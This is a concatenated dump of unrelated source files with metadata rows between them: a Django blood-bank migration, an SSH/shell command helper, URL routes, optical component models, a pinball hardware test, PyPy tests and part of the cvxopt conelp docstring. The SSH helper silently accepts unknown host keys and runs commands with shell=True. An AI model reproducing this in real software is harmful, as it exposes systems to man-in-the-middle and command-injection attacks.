                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('blood_type', models.CharField(choices=[('a+', 'A positive'), ('a-', 'A negative'), ('b+', 'B positive'), ('b-', 'B negative'), ('ab+', 'AB positive'), ('ab-', 'AB negative'), ('o+', 'O positive'), ('o-', 'O negative')], max_length=3)),
                ('telephone1', models.CharField(max_length=11)),
                ('telephone2', models.CharField(max_length=11, null=True)),
                ('birth_date', models.DateField()),
                ('address', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.address')),
            ],
        ),
        # Donation foreign keys are added after Donator/Nurse/CollectionBags/
        # Tubes exist, to satisfy creation-order dependencies.
        migrations.AddField(
            model_name='donation',
            name='donator',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.donator'),
        ),
        migrations.AddField(
            model_name='donation',
            name='nurse',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.nurse'),
        ),
        migrations.AddField(
            model_name='donation',
            name='serial_number_collection_bag',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.collectionbags'),
        ),
        migrations.AddField(
            model_name='donation',
            name='test_tube',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.tubes'),
        ),
        migrations.CreateModel(
            name='Allergies',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('category', models.CharField(choices=[('res', 'respiratory allergies'), ('ski', 'skin allergies'), ('eye', 'eye allergies'), ('foo', 'food allergies'), ('dru', 'drug allergies')], max_length=3)),
                ('subject', models.CharField(max_length=30)),
                ('donator', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='blood_bank.donator')),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('name', models.CharField(max_length=250)),
                ('email', models.EmailField(max_length=250, unique=True)),
                ('cpf', cpf_field.models.CPFField(max_length=11)),
                ('user_type', models.CharField(choices=[('don', 'donator'), ('nur', 'nurse'), ('adm', 'admin')], max_length=3)),
                ('is_active', models.BooleanField(default=True)),
                ('is_staff', models.BooleanField(default=False)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.permission', verbose_name='user permissions')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| 52.911111 | 266 | 0.582668 |
22047731f787363cd5b86c7e981c78f0b50669f6 | 1,197 | py | Python | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 281 | 2015-07-08T12:52:19.000Z | 2022-01-14T22:56:25.000Z | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 15 | 2015-08-03T14:54:30.000Z | 2021-01-27T12:30:06.000Z | armada_backend/remote.py | firesoft/armada | 245115fcf21d988db5da71f18b3123479de5f2c1 | [
"Apache-2.0"
] | 39 | 2015-07-13T14:43:44.000Z | 2022-01-12T15:41:32.000Z | import subprocess
def execute_local_command(command):
    """Run *command* through the local shell.

    :param command: shell command string (executed with ``shell=True``)
    :return: tuple ``(returncode, stdout_bytes, stderr_bytes)``
    """
    proc = subprocess.Popen(command, shell=True,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    stdout_data, stderr_data = proc.communicate()
    return proc.returncode, stdout_data, stderr_data
def execute_remote_command(remote_address, command):
    """Run *command* on a remote host over SSH using key-based auth.

    :param remote_address: dict with keys 'host', 'user', 'port' and
        'ssh_key' (path to a private RSA key file)
    :param command: command string to execute remotely
    :return: tuple ``(returncode, stdout_bytes, stderr_bytes)``
    """
    # Imported lazily so callers that only run local commands do not need
    # paramiko installed.
    import paramiko

    class SilentPolicy(paramiko.WarningPolicy):
        # Accept unknown host keys without emitting a warning.
        def missing_host_key(self, client, hostname, key):
            pass

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(SilentPolicy())
    ssh_key = paramiko.RSAKey.from_private_key_file(remote_address['ssh_key'])
    ssh.connect(remote_address['host'], username=remote_address['user'], pkey=ssh_key, port=int(remote_address['port']),
                timeout=10)
    try:
        # Fix: previously the SSH session leaked if exec_command or the
        # channel reads raised; close it unconditionally.
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
        ssh_out = ssh_stdout.read()
        ssh_err = ssh_stderr.read()
        ssh_return_code = ssh_stdout.channel.recv_exit_status()
    finally:
        ssh.close()
    return ssh_return_code, ssh_out, ssh_err
def execute_command(command, remote_address=None):
    """Dispatch *command* locally, or over SSH when *remote_address* is given.

    :param command: command string to run
    :param remote_address: optional dict accepted by execute_remote_command;
        falsy values (None, empty dict) select local execution
    :return: tuple ``(returncode, stdout_bytes, stderr_bytes)``
    """
    if not remote_address:
        return execute_local_command(command)
    return execute_remote_command(remote_address, command)
| 30.692308 | 120 | 0.711779 |
e19bc924e042affb25fa695da8f1634cf360c285 | 266 | py | Python | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | gameProject/gameApp/urls.py | cs-fullstack-2019-spring/django-mini-project4-carlos-clyde | 78dadb69cf5ec83c0c3801f30b7853338887c542 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from . import views
# Route table for gameApp: maps each URL path to its view function.
urlpatterns = [
    path('', views.index, name='index'),  # site root -> views.index
    path('login/', views.login, name='login'),  # -> views.login
    path('createuser/', views.newuser, name='newuser'),  # -> views.newuser
    path('addgame/',views.newgame, name='newgame')  # -> views.newgame
]
| 20.461538 | 55 | 0.646617 |
5f0b338bee7d415e6e8cd6f4fb554f4bc4fa722c | 2,531 | py | Python | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | arch/blocks/electro_optics.py | bigphoton/arch | 95a197d6b89bc2316b0d88b2b1345cbbb90088ec | [
"Unlicense"
] | null | null | null | """
Functions and objects describing electro-optic components.
"""
from arch.block import Block
from arch.models.model import Linear, SymbolicModel
from sympy import Matrix, sqrt, exp, I, pi
import arch.port as port
class Switch2x2(Block):
    """
    2x2 optical switch with finite loss and extinction.

    extinction_ratio: ratio of desired signal to undesired signal from the
        wrong output port
    loss_dB: positive number of decibels of loss
        (0 dB -> 100% tx; 10 dB -> 10% tx)
    """

    reference_prefix = "SW"

    def define(self, loss_dB = 3.0, extinction_ratio=1000.0):
        # Two optical inputs, two optical outputs and one digital control.
        self.add_port(name='in0', kind=port.kind.optical, direction=port.direction.inp)
        self.add_port(name='in1', kind=port.kind.optical, direction=port.direction.inp)
        self.add_port(name='out0', kind=port.kind.optical, direction=port.direction.out)
        self.add_port(name='out1', kind=port.kind.optical, direction=port.direction.out)
        state = self.add_port(name='state', kind=port.kind.digital,
            direction=port.direction.inp)

        # Power transmission corresponding to loss_dB decibels of loss.
        tx = 10**(-loss_dB/10)
        er = extinction_ratio
        # Lagrange polynomial through (state=0, 1/er) and (state=1, 1 - 1/er):
        # the power fraction routed to the "straight-through" path.
        r = (state-0)/(1-0)*(1-1/er) + (state-1)/(0-1)*(1/er)

        # 2x2 transfer matrix, scaled by the amplitude transmission sqrt(tx).
        M = sqrt(tx) * Matrix([
                [sqrt(r), I*sqrt(1 - r)],
                [I*sqrt(1 - r), sqrt(r)] ])

        self.add_model(Linear('simple switch '+self.name, block=self, unitary_matrix=M))
class ThermoOpticPhaseShifterBasicRT(Block):
    """
    Thermo-optic phase shifter with a resistive heater.
    Due to Dario, based on https://doi.org/10.1364/OE.27.010456
    """
    reference_prefix = "TOPM"
    def define(self, device_length=None, centre_wavelength=2.0E-6, ref_index_temp_func=lambda T:1.0*T, R=None):
        """
        device_length: physical length of the phase-shifting section
        centre_wavelength: operating wavelength (default 2.0 um)
        ref_index_temp_func: refractive index as a function of temperature T
        R: heater resistance used in the electrical two-port relations
        i0: input port current
        v0: input port voltage
        """
        # NOTE(review): device_length and R default to None; the expressions
        # below fail with None, so callers presumably always supply both.
        # Electrical two-port (ABCD-style) coefficients; B = -R couples the
        # input current into the output voltage below.
        A,B,C,D = 1,-R,0,1
        # NOTE(review): M is built but never used in this method — dead code?
        M = Matrix([[A,B],[C,D]])
        inp = self.add_port(name='inp', kind=port.kind.optical, direction=port.direction.inp)
        out = self.add_port(name='out', kind=port.kind.optical, direction=port.direction.out)
        # NOTE(review): the i* ports are declared kind=voltage and the v*
        # ports kind=current — this looks swapped relative to the names;
        # confirm against the port.kind definitions before changing.
        i0 = self.add_port(name='i0', kind=port.kind.voltage, direction=port.direction.inp)
        v0 = self.add_port(name='v0', kind=port.kind.current, direction=port.direction.inp)
        i1 = self.add_port(name='i1', kind=port.kind.voltage, direction=port.direction.out)
        v1 = self.add_port(name='v1', kind=port.kind.current, direction=port.direction.out)
        T = self.add_port(name='T', kind=port.kind.temperature, direction=port.direction.inp)
        # Output expressions: temperature-dependent optical phase on the
        # optical path, plus the electrical two-port relations.
        oes = {
            out: exp(I* (2*pi*device_length/centre_wavelength)*ref_index_temp_func(T) )*inp,
            v1: +A*v0 + B*i0,
            i1: -C*v0 - D*i0}
        self.add_model(SymbolicModel('simple phase '+self.name, block=self, out_exprs=oes))
| 31.6375 | 108 | 0.694192 |
4adad49ce125817a0ee4811588e969da354c738c | 397 | py | Python | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | null | null | null | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | 10 | 2021-06-25T15:10:26.000Z | 2021-07-15T12:50:21.000Z | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | 3 | 2021-06-16T07:39:05.000Z | 2022-03-16T09:31:55.000Z | method_args = {
"param": "log",
"init": "scaled_anisotropic_init",
"stopping_criterion": "strict",
"do_profiling": True,
"optim_scheme": [[1 + 19 * 50, 0.35**2]],
"bench_type": "monte-carlo",
}
| 44.111111 | 63 | 0.319899 |
357faa371768341f397d10bddaf919fe8e85d4ba | 122 | py | Python | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 71 | 2021-12-06T22:41:59.000Z | 2022-03-31T21:47:16.000Z | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 171 | 2021-12-14T07:34:57.000Z | 2022-03-31T21:04:15.000Z | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 11 | 2021-12-06T22:46:23.000Z | 2022-03-31T18:09:46.000Z | import os
from astro.constants import DEFAULT_SCHEMA
# SQL schema name: the environment variable overrides the package default.
# Note the ``or``: an empty-string environment value also falls back to
# DEFAULT_SCHEMA.
SCHEMA = os.getenv("AIRFLOW__ASTRO__SQL_SCHEMA") or DEFAULT_SCHEMA
| 20.333333 | 66 | 0.836066 |
cd003e8bdfa3af1fed760fab6559d797dcddb604 | 4,710 | py | Python | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | """Test MyPinballs Platform."""
import time
from mpf.tests.MpfTestCase import MpfTestCase
from mpf.tests.loop import MockSerial
class MockMypinballsSocket(MockSerial):
    """Serial mock for the MyPinballs hardware.

    Writes are validated against ``expected_commands`` (one-shot) and
    ``permanent_commands`` (reusable); configured replies are queued and
    handed back by ``read``.
    """

    def __init__(self):
        super().__init__()
        self.name = "SerialMock"
        self.expected_commands = {}
        self.queue = []
        self.permanent_commands = {}
        self.crashed = False

    def read(self, length):
        """Return one queued reply (the *length* argument is ignored)."""
        del length
        if self.queue:
            return self.queue.pop()
        return b''

    def read_ready(self):
        """True when a reply is waiting to be read."""
        return bool(self.queue)

    def write_ready(self):
        """The mock is always ready to accept a write."""
        return True

    def write(self, msg):
        """Consume one written command and queue its configured reply.

        An expected entry takes precedence over a permanent one; a command
        that is neither flags ``crashed`` and raises AssertionError.
        """
        if msg in self.permanent_commands and msg not in self.expected_commands:
            self.queue.append(self.permanent_commands[msg])
            return len(msg)
        if msg not in self.expected_commands:
            self.crashed = True
            raise AssertionError("Unexpected command: " + msg.decode() + "".join("\\x%02x" % b for b in msg) +
                                 " len: " + str(len(msg)))
        reply = self.expected_commands[msg]
        if reply is not False:
            self.queue.append(reply)
        del self.expected_commands[msg]
        return len(msg)
class MyPinballsPlatformTest(MpfTestCase):
    """Functional test of the MyPinballs segment display platform.

    All serial traffic goes through MockMypinballsSocket; each step programs
    the exact command bytes the platform is expected to send.
    """
    def get_config_file(self):
        return 'config.yaml'
    def get_machine_path(self):
        return 'tests/machine_files/mypinballs/'
    def _mock_loop(self):
        # Attach the serial mock to the port the platform config uses.
        self.clock.mock_serial("/dev/ttyUSB0", self.serialMock)
    def tearDown(self):
        # A crashed mock means the platform sent an unexpected command.
        self.assertFalse(self.serialMock.crashed)
        super().tearDown()
    def get_platform(self):
        return False
    def _wait_for_processing(self):
        # Advance machine time until all expected commands are consumed,
        # the mock crashes, or 10 seconds of wall time elapse.
        start = time.time()
        while self.serialMock.expected_commands and not self.serialMock.crashed and time.time() < start + 10:
            self.advance_time_and_run(.01)
    def setUp(self):
        self.serialMock = MockMypinballsSocket()
        # all display are reset at startup
        self.serialMock.expected_commands = {
            b'3:1\n': False,
            b'3:2\n': False,
            b'3:6\n': False,
        }
        self.serialMock.permanent_commands = {}
        super().setUp()
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
    def testPlatform(self):
        # NOTE(review): command format inferred from usage below —
        # "1:<disp>:<text>" set text, "2:<disp>:<text>" flash, "3:<disp>"
        # clear; confirm against the platform implementation.
        self.serialMock.expected_commands = {
            b'1:1:1234\n': False,
        }
        self.machine.segment_displays["display1"].add_text("1234", key="score")
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        # change text (with same key)
        self.serialMock.expected_commands = {
            b'1:1:1337\n': False,
        }
        self.machine.segment_displays["display1"].add_text("1337", key="score")
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        # change text (with same key)
        self.serialMock.expected_commands = {
            b'1:1:42?23\n': False,
        }
        self.machine.segment_displays["display1"].add_text("42 23", key="score")
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        # set to empty
        self.serialMock.expected_commands = {
            b'3:1\n': False,
        }
        self.machine.segment_displays["display1"].remove_text_by_key("score")
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        self.serialMock.expected_commands = {
            b'1:2:424242\n': False,
        }
        self.machine.segment_displays["display2"].add_text("424242")
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        self.serialMock.expected_commands = {
            b'2:2:424242\n': False,
        }
        self.machine.segment_displays["display2"].set_flashing(True)
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
        self.serialMock.expected_commands = {
            b'1:2:424242\n': False,
        }
        self.machine.segment_displays["display2"].set_flashing(False)
        self._wait_for_processing()
        self.assertFalse(self.serialMock.expected_commands)
| 31.4 | 110 | 0.606369 |
a3fdd844f485f87358cf4a8e68029866530b4058 | 246 | py | Python | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | if __name__ == "__main__":
if __package__ == "": # running as python pypiserver-...whl/pypiserver?
import sys, os
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from pypiserver import core
core.main()
| 35.142857 | 76 | 0.650407 |
4e7dd8256c7fec06fc7e27edb6df901a3221df13 | 187 | py | Python | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from botlib.tgclient import TGClient
# Prompt the user to start a chat; presumably listen_chat_info then reports
# the chat id for that conversation (see botlib.tgclient — confirm).
print('open a new telegram chat window with your bot and send /start')
# __API_KEY__ is a placeholder name: replace with the bot's API token.
TGClient.listen_chat_info(__API_KEY__, 'my-username')
| 26.714286 | 70 | 0.786096 |
17c18d5346133caac81425008b367ea1e0dc9dfe | 1,631 | py | Python | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2022-03-30T11:42:37.000Z | 2022-03-30T11:42:37.000Z | import pytest
def test_yield_in_nested_try_excepts():
    # Regression test for issue #25612: a SubError delivered via throw() and
    # swallowed inside the generator must not clobber the MainError that the
    # enclosing except block re-raises.
    class MainError(Exception):
        pass

    class SubError(Exception):
        pass

    def gen():
        try:
            raise MainError()
        except MainError:
            try:
                yield
            except SubError:
                pass
            raise

    running = gen()
    running.send(None)
    with pytest.raises(MainError):
        running.throw(SubError())
def test_generator_doesnt_retain_old_exc2():
    # Skipped unconditionally: the behaviour under test is not implemented.
    pytest.skip("broken right now :-(")
    # Issue bpo 28884#msg282532
    # Fixed in CPython via https://github.com/python/cpython/pull/1773
    import sys
    def g():
        try:
            raise ValueError
        except ValueError:
            yield 1
        # Outside the except block the generator should observe no active
        # exception, even though the caller resumed it from inside one.
        assert sys.exc_info() == (None, None, None)
        yield 2
    gen = g()
    try:
        raise IndexError
    except IndexError:
        assert next(gen) == 1
    assert next(gen) == 2
def test_raise_in_generator():
    # Regression test for issue 25612#msg304117: a bare ``raise`` inside a
    # generator re-raises the exception that was active when the generator
    # frame was resumed.
    def gen():
        yield 1
        raise
        yield 2

    with pytest.raises(ZeroDivisionError):
        it = gen()
        try:
            1/0
        except:
            next(it)
        next(it)
def test_assertion_error_global_ignored():
    # Runs only where pytest lacks py3k_skip (message says "only
    # untranslated" — confirm which interpreter that targets).
    if hasattr(pytest, 'py3k_skip'):
        pytest.py3k_skip('only untranslated')
    # Shadow the builtin AssertionError at module level and check that a
    # failing ``assert`` still raises the *original* AssertionError.
    global AssertionError
    class Foo(Exception):
        pass
    OrigAssertionError = AssertionError
    AssertionError = Foo
    try:
        with pytest.raises(OrigAssertionError): # not Foo!
            assert 0
    finally:
        # Always restore the global so later tests are unaffected.
        AssertionError = OrigAssertionError
| 21.460526 | 70 | 0.568976 |
244e54d7fb03d6cb54fbbbfcefa97357bde887ca | 168,050 | py | Python | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | """
Solver for linear and quadratic cone programs.
"""
# Copyright 2012-2021 M. Andersen and L. Vandenberghe.
# Copyright 2010-2011 L. Vandenberghe.
# Copyright 2004-2009 J. Dahl and L. Vandenberghe.
#
# This file is part of CVXOPT.
#
# CVXOPT is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# CVXOPT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
# Python 2/3 compatibility: Python 3 has no ``long``; alias it to ``int``.
if sys.version > '3': long = int

# Nothing is exported via ``from coneprog import *``.
__all__ = []

# Global dictionary of solver options; solver functions fall back to it when
# no per-call ``options`` keyword is supplied (see kwargs.get('options', ...)).
options = {}
def conelp(c, G, h, dims = None, A = None, b = None, primalstart = None,
dualstart = None, kktsolver = None, xnewcopy = None, xdot = None,
xaxpy = None, xscal = None, ynewcopy = None, ydot = None, yaxpy = None,
yscal = None, **kwargs):
"""
Solves a pair of primal and dual cone programs
minimize c'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -h'*z - b'*y
subject to G'*z + A'*y + c = 0
z >= 0.
The inequalities are with respect to a cone C defined as the Cartesian
product of N + M + 1 cones:
C = C_0 x C_1 x .... x C_N x C_{N+1} x ... x C_{N+M}.
The first cone C_0 is the nonnegative orthant of dimension ml.
The next N cones are second order cones of dimension mq[0], ...,
mq[N-1]. The second order cone of dimension m is defined as
{ (u0, u1) in R x R^{m-1} | u0 >= ||u1||_2 }.
The next M cones are positive semidefinite cones of order ms[0], ...,
ms[M-1] >= 0.
Input arguments (basic usage).
c is a dense 'd' matrix of size (n,1).
dims is a dictionary with the dimensions of the components of C.
It has three fields.
- dims['l'] = ml, the dimension of the nonnegative orthant C_0.
(ml >= 0.)
- dims['q'] = mq = [ mq[0], mq[1], ..., mq[N-1] ], a list of N
integers with the dimensions of the second order cones C_1, ...,
C_N. (N >= 0 and mq[k] >= 1.)
- dims['s'] = ms = [ ms[0], ms[1], ..., ms[M-1] ], a list of M
integers with the orders of the semidefinite cones C_{N+1}, ...,
C_{N+M}. (M >= 0 and ms[k] >= 0.)
The default value of dims is {'l': G.size[0], 'q': [], 's': []}.
G is a dense or sparse 'd' matrix of size (K,n), where
K = ml + mq[0] + ... + mq[N-1] + ms[0]**2 + ... + ms[M-1]**2.
Each column of G describes a vector
v = ( v_0, v_1, ..., v_N, vec(v_{N+1}), ..., vec(v_{N+M}) )
in V = R^ml x R^mq[0] x ... x R^mq[N-1] x S^ms[0] x ... x S^ms[M-1]
stored as a column vector
[ v_0; v_1; ...; v_N; vec(v_{N+1}); ...; vec(v_{N+M}) ].
Here, if u is a symmetric matrix of order m, then vec(u) is the
matrix u stored in column major order as a vector of length m**2.
We use BLAS unpacked 'L' storage, i.e., the entries in vec(u)
corresponding to the strictly upper triangular entries of u are
not referenced.
h is a dense 'd' matrix of size (K,1), representing a vector in V,
in the same format as the columns of G.
A is a dense or sparse 'd' matrix of size (p,n). The default value
is a sparse 'd' matrix of size (0,n).
b is a dense 'd' matrix of size (p,1). The default value is a
dense 'd' matrix of size (0,1).
The argument primalstart is a dictionary with keys 'x', 's'. It
specifies an optional primal starting point.
- primalstart['x'] is a dense 'd' matrix of size (n,1).
- primalstart['s'] is a dense 'd' matrix of size (K,1),
representing a vector that is strictly positive with respect
to the cone C.
The argument dualstart is a dictionary with keys 'y', 'z'. It
specifies an optional dual starting point.
- dualstart['y'] is a dense 'd' matrix of size (p,1).
- dualstart['z'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
It is assumed that rank(A) = p and rank([A; G]) = n.
The other arguments are normally not needed. They make it possible
to exploit certain types of structure, as described below.
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'residual as primal infeasibility certificate',
'residual as dual infeasibility certificate', 'iterations'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The 'iterations' field is the
number of iterations taken. The values of the other fields depend
on the exit status.
Status 'optimal'.
- 'x', 's', 'y', 'z' are an approximate solution of the primal and
dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0.
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e },
where
e = ( e_0, e_1, ..., e_N, e_{N+1}, ..., e_{M+N} )
is the identity vector in C. e_0 is an ml-vector of ones,
e_k, k = 1,..., N, are unit vectors (1,0,...,0) of length mq[k],
and e_k = vec(I) where I is the identity matrix of order ms[k].
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
The primal infeasibility is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). The dual infeasibility
is guaranteed to be less than solvers.options['feastol']
(default 1e-7). The gap is less than solvers.options['abstol']
(default 1e-7) or the relative gap is less than
solvers.options['reltol'] (default 1e-6).
Status 'primal infeasible'.
- 'x', 's': None.
- 'y', 'z' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
The residual as primal infeasiblity certificate is guaranteed
to be less than solvers.options['feastol'] (default 1e-7).
Status 'dual infeasible'.
- 'x', 's' are an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'z': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack, sup {t | s >= t*e}.
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
The residual as dual infeasiblity certificate is guaranteed
to be less than solvers.options['feastol'] (default 1e-7).
Status 'unknown'.
- 'x', 'y', 's', 'z' are the last iterates before termination.
These satisfy s > 0 and z > 0, but are not necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e}.
- 'dual slack': the smallest dual slack, sup {t | z >= t*e}.
- 'residual as primal infeasibility certificate': None if
h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / ( -(h'*z + b'*y) * max(1, ||c||) )
otherwise.
